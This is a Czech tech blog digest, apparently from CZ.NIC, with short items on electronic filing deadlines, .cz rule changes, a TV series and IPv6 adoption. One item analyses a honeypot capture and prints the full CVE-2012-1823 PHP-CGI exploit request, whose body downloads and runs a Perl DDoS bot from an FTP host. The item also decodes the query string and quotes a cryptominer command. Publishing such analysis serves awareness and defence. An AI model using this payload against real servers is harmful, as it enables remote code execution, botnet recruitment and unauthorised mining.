Elektronická podání na „sociálku“ se o rok odkládají

Česká správa sociálního zabezpečení (ČSSZ) plánovala, že s úderem Nového roku bude od podnikatelů přijímat jednotlivé formuláře (např. evidenční listy důchodového pojištění či přehled o příjmech OSVČ) pouze elektronicky.

První, kdo se této změně přinášející ve většině případů nutnost založení datové schránky začal bránit, byli lékaři, kteří si vymohli odklad zasílání elektronických neschopenek o dva roky, tedy až od 1. ledna 2016. Po lékařích následovali živnostníci (OSVČ), kteří dostali roční výjimku. Dlouho se však zdálo, že zaměstnavatelé této povinnosti neuniknou. Nakonec se ale těsně před začátkem nového roku ČSSZ rozhodla odložit povinnost zasílání elektronických formulářů (např. ELDP – evidenčních listů důchodového pojištění, přehledů o výši pojistného či oznámení o nástupu do zaměstnání) i pro ně.

Pro některé však radost z osvobození od povinných elektronických podání může být předčasná. Kdo povinnosti (jak se alespoň nyní zdá :) neunikne, jsou plátci DPH s obratem vyšším než 6 mil. Kč. Toto podání půjde podat jak prostřednictvím datové schránky, tak daňového portálu.

Pro ty, které již nebaví sledovat všechny změny v datových schránkách a naopak se chtějí dozvědět o něco (hodně) více, než se dočtou v diskuzích na webu, je určen Ministerstvem vnitra akreditovaný kurz „Datové schránky“, který vede přední český odborník Jiří Peterka.

Jiří Průša

Virtuální měny jako příležitost pro hackery

Mezi honeypoty, které sdružení CZ.NIC provozuje, patří i honeypot Glastopf. Ten simuluje webovou aplikaci a zaznamenává pokusy o útoky na ni. Předminulý týden jsem na něm narazil na tento HTTP požadavek:

POST //cgi-bin/php?%2D%64+%61%6C%6C%6F%77%5F%75%72%6C%5F%69%6E%63%6C%75%64%65%3D%6F
%6E+%2D%64+%73%61%66%65%5F%6D%6F%64%65%3D%6F%66%66+%2D%64+%73%75%68%6F%73%69%6E%2E
%73%69%6D%75%6C%61%74%69%6F%6E%3D%6F%6E+%2D%64+%64%69%73%61%62%6C%65%5F%66%75%6E%63
%74%69%6F%6E%73%3D%22%22+%2D%64+%6F%70%65%6E%5F%62%61%73%65%64%69%72%3D%6E%6F%6E%65
+%2D%64+%61%75%74%6F%5F%70%72%65%70%65%6E%64%5F%66%69%6C%65%3D%70%68%70%3A%2F%2F%69
%6E%70%75%74+%2D%64+%63%67%69%2E%66%6F%72%63%65%5F%72%65%64%69%72%65%63%74%3D%30+
%2D%64+%63%67%69%2E%72%65%64%69%72%65%63%74%5F%73%74%61%74%75%73%5F%65%6E%76%3D%30
+%2D%64+%61%75%74%6F%5F%70%72%65%70%65%6E%64%5F%66%69%6C%65%3D%70%68%70%3A%2F%2F
%69%6E%70%75%74+%2D%6E HTTP/1.1
Content-Length: 264
Content-Type: application/x-www-form-urlencoded
Host: -h

<? system("killall -9 perl;
killall -9 php;
cd /tmp;
wget ftp://199.71.214.66/bko -O /tmp/bko;
curl -O ftp://199.71.214.66/bko -O /tmp/bko;
fetch -U ftp://199.71.214.66/bko -O /tmp/bko;
lwp-download ftp://199.71.214.66/bko -O /tmp/bko;
perl /tmp/bko;
rm -rf /mpbko*"); ?>

Když dekódujeme query string, získáme toto (zformátováno):

-d+allow_url_include=on
+-d+safe_mode=off
+-d+suhosin.simulation=on
+-d+disable_functions=""
+-d+open_basedir=none
+-d+auto_prepend_file=php://input
+-d+cgi.force_redirect=0
+-d+cgi.redirect_status_env=0
+-d+auto_prepend_file=php://input
+-n

Jedná se o zneužití zranitelnosti PHP označené CVE-2012-1823 a její nekompletní opravy CVE-2012-2311, které cílí na verze nižší než 5.4.3 nebo 5.3.13 a prostředí, kde se PHP používá v konfiguraci CGI. Ve stručnosti je problém v neošetřeném případu, kdy v query stringu chybí znak „=“ a výše uvedené parametry se předávají při spuštění PHP (jejich částečné vysvětlení je například zde). Tělo tohoto požadavku je PHP skript s voláním funkce system, která spustí zadané příkazy s oprávněním, pod kterým běží web server.

Jakmile už má útočník možnost spouštět libovolné příkazy, následuje obvyklý scénář: stáhnout a spustit připravené soubory, v tomto případě IRC klienta DDoS Perl IrcBot 1.0. Zde končí informace, které nám dal honeypot. Další postup se dá ale odhadnout, když se podíváme, jaké další soubory jsou na použitém ftp serveru: mimo jiné dva binární soubory – 32 a 64bitová verze mineru cpuminer pro virtuální měnu Litecoin a instalační skript, který zajistí jeho spouštění přes crontab. Pokud někdo netuší, co jsou minery, tak se jedná o programy, kterými lze tzv. dolovat virtuální měny pomocí výpočtu složitých matematických úloh. V samotném spuštění mineru lze přečíst i přihlašovací údaje daného uživatele:

m64 -o stratum+tcp://hk.wemineltc.com:3333 -O judge.1:x -B

Jak je patrné minimálně z tohoto dotazu na stackoverflow.com, stejnou konfiguraci používal útočník již v říjnu. Že je dolování virtuálních měn novou možností pro hackery jak zhodnotit své útoky, o tom svědčí i tato zpráva Avastu z letošního srpna. V tomto případě se jednalo pro změnu u útok na Windows a dolovaly se Bitcoiny.

Jiří Machálek

Ohlédnutí za Jak na Internet

Letošní sezóna seriálu Jak na Internet je za námi, přichází tedy na řadu její stručná rekapitulace doplněná ohlédnutím za sezónou 2012. V sezónách 2012 a 2013 bylo zprodukováno 85 epizod, jejichž celková sledovanost na ČT1 v primetime přesáhla 36 miliónů diváků.

Letos jsme vyrobili a odvysílali 45 nových dílů. Při výběru témat jsme se zaměřili na zcela nové oblasti, jako např. start-upy, typy souborů, 3D tisk nebo správa a řízení Internetu, ale také na prohloubení témat loňské série, ke kterým letos přidáváme konkrétní tipy a doporučení, jak na to. Příkladem je třeba díl „78. Autorský zákon na Internetu“ navazující na loňský díl „12. Autorská práva“, nebo „82. Jak začít blogovat“ navazující na díl „11. Publikování na Internetu“.

Za zmínku také stojí porovnání sledovanosti obou sezón. Zatímco vloni byla průměrná sledovanost jednoho dílu 356 tis. diváků, letos jsme zaznamenali nárůst více než o třetinu, tedy průměrně 483 tis. diváků na jeden díl. Divácká maxima přitom stoupla z loňských 521 tis. na letošních 735 tis. Ve skladbě sezóny 2013 lehce převažují ženy, přitom 73 % diváků je starších 45 let. V sezóně 2012 naopak nepatrně převažovalo mužské publikum při 72% poměru diváků starších 45 let. Již zmiňovaných 36 miliónů diváků obou sezón je rozloženo na 21,7 mil. letos a 14,3 mil. vloni.

Po celou dobu vysílání na ČT probíhala aktivní komunikace na facebookové stránce seriálu v podobě tipovacích a vědomostních soutěží, při nichž bylo soutěžícím rozděleno více než 100 nejrůznějších odměn a dárků.

Ondřej Písek

Co přinesou nová Pravidla registrace domén .cz?

Od 1. ledna příštího roku začnou platit nová Pravidla registrace doménových jmen .cz. Hlavním motivem pro úpravy tohoto dokumentu se stala rekodifikace soukromého práva. Nové znění Pravidel tedy především reaguje na novou právní úpravu občanského práva (např. čl. 2.2.15, čl. 3). Další změny vycházejí vstříc námětům registrátorů a členů sdružení či reagují na faktický stav (čl. 2.1 zdůrazňující hodnotu doménového jména, nový čl. 2.2.17. definující identifikátor kontaktu, čl. 13.2. upravující mazání neužívaných kontaktů). Snažili jsme se rovněž o zpřehlednění a jisté zjednodušení tohoto dokumentu, byť zeštíhlit se jej bohužel nepovedlo. Ani jedna z úprav však nepřináší zásadní změny.

V průběhu roku jsme chystané změny diskutovali, a to nejen s našimi členy a registrátory, ale také s s odborníky z Právnické fakulty Masarykovy univerzity v Brně.

Současně s Pravidly registrace dochází také k úpravám řady dalších dokumentů, zejména Pravidel ADR, Obchodních podmínek pro registrátory, Pravidel a Podmínek služby mojeID. Rovněž změny v těchto dokumentech mají především povahu reakce na novou úpravu soukromého práva.

Zuzana Průchová

Nejvýznamnější firmy IPv6 přehlížejí!

O tom, že Česká republika patří při zavádění IPv6 minimálně mezi evropské lídry, jsme psali již několikrát; aktuální statistiky vytvářené na základě 500 nejnavštěvovanějších stránek poskytuje např. IPv6 Observatory.

V rámci evropského projektu GEN6 pak CZ.NIC monitoruje připravenost veřejné správy na IPv6. Zde dosavadní výsledky opět potvrzují vedoucí postavení České republiky. Na žádost Ministerstva průmyslu a obchodu jsme nyní náš průzkum rozšířili o analýzu TOP100 firem (dle obratu). Výsledky „tahounů“ českého hospodářství celkem překvapivě ukázaly, že IPv6 nepatří ve velkých firmách mezi favority a na svých webových serverech ji podporuje jen 5 společností ze 100. Jak ukazuje následující tabulka, o poznání lepší není situace ani u jmenných a poštovních serverů.

Webové servery DNS servery E-mailové servery
Veřejná správa 28,4 % 50,4 % 10,4 %
TOP100 firem 5,0 % 44,0 % 5,0 %
Průměr za doménu .cz 19,2 % 54,7 % 16,2 %

Výše uvedené srovnání ukazuje, že při zavádění IPv6 jsou nejvýznamnější firmy jak pod celostátním průměrem, tak daleko za veřejnou správou. Zklamáním je, že IPv6 příliš nepodporují na svých stránkách ani technologické firmy jako T-Mobile, Vodafone či Česká pošta, která se snaží působit jako státní integrátor v oblasti IT. Jedinou společností z TOP100, která podporuje IPv6 jak na svých webových, tak jmenných a poštovních serverech je pak trochu překvapivě Sokolovská uhelná.

Jiří Průša